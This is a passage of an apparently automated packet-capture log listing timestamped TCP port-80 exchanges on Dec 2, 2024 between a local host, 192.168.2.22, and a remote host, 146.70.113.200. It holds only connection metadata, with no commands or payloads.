                                                  Dec 2, 2024 07:24:42.323667049 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.323734045 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.332019091 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.332067013 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.332125902 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.340424061 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.340622902 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.340682030 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.348906994 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.349025965 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.349086046 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.357232094 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.357342958 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.357398033 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.365648031 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.365747929 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.366309881 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.374082088 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.374228001 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.374286890 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.382522106 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.382599115 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.382663965 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.390897989 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.390945911 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.512221098 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.512413025 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.512486935 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.515168905 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.517123938 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.533299923 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.533528090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.533588886 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.536262035 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.536317110 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.536350012 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.537101984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.540844917 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.540986061 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.541040897 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.546840906 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.546911955 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.546961069 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.552762985 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.552891016 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.552942991 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.558696032 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.558789015 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.558845043 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.564795017 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.564934969 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.564989090 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.570561886 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.570638895 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.570692062 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.576478958 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.576596975 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.576642990 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.582443953 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.582520962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.582577944 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.588325977 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.588362932 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.588439941 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.589099884 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.594274044 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.594377995 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.594428062 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.600207090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.600370884 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.600424051 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.632447958 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.632507086 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.632600069 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.633106947 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.636442900 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.756479025 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.756536007 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.756535053 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.756587029 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.757864952 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.757913113 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.757973909 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.758018970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.760829926 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.760874033 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.760945082 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.760987997 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.763811111 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.763856888 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.763969898 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.764017105 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.766585112 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.766637087 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.767798901 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.767858028 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.767999887 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.768047094 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.770710945 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.770756960 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.770865917 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.770908117 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.773616076 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.773669958 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.773736000 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.773777008 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.776551008 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.776601076 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.776628017 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.776662111 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.779443979 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.779553890 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.779557943 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.779587984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.782416105 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.782435894 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.782463074 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.782485962 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.785429955 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.785442114 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.785531044 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.788223028 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.788265944 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.788305044 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.788336039 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.791078091 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.791126966 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.791194916 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.791244984 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.793972015 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.794015884 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.794101000 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.794142008 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.796947956 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.797005892 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.797077894 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.797117949 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.799813986 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.799860954 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.799918890 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.799956083 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.802737951 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.802786112 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.802840948 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.802881002 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.805690050 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.805737019 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.805850983 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.805891037 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.808566093 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.808621883 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.808669090 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.808701038 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.811558962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.811599970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.811629057 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.811659098 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.814405918 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.814455032 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.814846992 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.814892054 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.817346096 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.817388058 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.817416906 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.817455053 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.820261002 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.820306063 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.820477009 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.820538044 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.823112965 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.823156118 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.823184967 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.823236942 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.825989962 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.826030970 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.826127052 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.826165915 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.828917980 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.828963041 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.829025984 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.829058886 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.876728058 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.876740932 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.876789093 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.878051043 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.878098011 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.878144026 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.878195047 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.880978107 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.881026983 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.881097078 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.881139040 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.883913994 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.883970976 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.883996010 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.884038925 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:46.618942976 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.611013889 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.731082916 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:47.731190920 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.731422901 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:47.851411104 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307605982 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307630062 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307641029 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307749987 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307806969 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307826042 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307836056 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307847977 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.307852030 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307871103 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.307887077 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308017969 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308048964 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308059931 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.308063030 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308088064 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.308098078 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.310390949 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.427865028 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.427898884 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.427936077 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.427937031 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.530177116 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.530275106 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.530291080 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.530318975 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.534389019 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.534451962 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.534476995 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.534487963 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.542773008 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.542825937 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.542843103 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.542907000 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551119089 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.551198006 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551294088 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.551348925 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.551350117 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.559580088 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.559637070 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.559654951 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.559693098 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.567954063 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.568008900 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.568021059 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.568057060 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.576385975 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.576443911 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.576452971 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.576498032 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.584810972 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.584867954 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.584950924 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.585000992 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.593173981 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.593239069 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.593275070 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.593310118 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.601617098 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.601675987 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.601713896 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.601753950 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.610040903 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.610096931 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.610166073 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.610210896 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.752559900 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.752696991 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.752789974 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.754264116 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.754349947 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.754411936 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.757148981 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.760049105 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.760169029 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.760216951 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.765844107 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.765959024 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.766012907 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.771681070 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.771732092 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.771821976 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.771866083 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.777514935 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.777591944 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.777621031 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.777661085 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.783319950 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.783377886 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.783380985 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.783423901 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.789129972 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.789206028 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.789223909 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.789395094 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.794883013 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.794940948 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.794984102 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.795025110 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.800740957 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.800812960 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.800834894 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.800879955 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.806466103 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.806521893 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.806749105 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.806797981 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.812355042 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.812449932 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.812453985 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.812504053 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.818161964 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.818214893 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.818252087 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.818291903 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.824007988 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.824047089 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.824089050 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.829668045 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.829726934 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.829783916 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.829822063 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.835501909 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.835547924 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.835613966 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.835649014 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.841272116 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.841320992 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.841409922 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.841453075 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.953839064 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.953875065 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.953885078 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.954178095 CET4916580192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:49.975050926 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.975059986 CET8049165146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:49.975106955 CET4916580192.168.2.22146.70.113.200
